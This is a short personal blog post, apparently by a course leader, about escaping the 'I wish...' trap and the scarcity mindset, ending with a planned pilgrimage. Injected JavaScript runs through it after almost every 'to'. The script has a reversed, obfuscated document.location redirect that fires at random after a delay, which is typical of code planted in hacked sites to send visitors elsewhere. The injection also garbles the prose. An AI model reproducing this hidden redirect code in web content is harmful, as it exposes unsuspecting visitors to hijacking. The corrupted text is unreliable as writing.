I’m writing this on a wet Tuesday afternoon in August. It’s been one of those days when I can easily fall intobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to the “I wish…” trap.
- I wish it was sunnier.
- I wish the heating system would never go wrong.
- I wish I didn’t have tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to worry about going shopping or eating out.
- I wish I could get back intobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to a room with my students.
- I wish I could run like I used tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, but I can’t because of my arthritic hips.
- I wish I could do all the things I used tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to do.
And of course, “I wish…” can be a dangerous trap tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to fall intobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, because it just focuses the mind on all the things that are going wrong, or that I haven’t got.
Have you got a scarcity mindset?
It’s called a “scarcity mindset”, and quite honestly, it’s tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toxic.
In my courses I often remind people that “your energy flows where your focus goes”. Time for a change for the better

Now I’m planning a 62 mile pilgrimage in September.
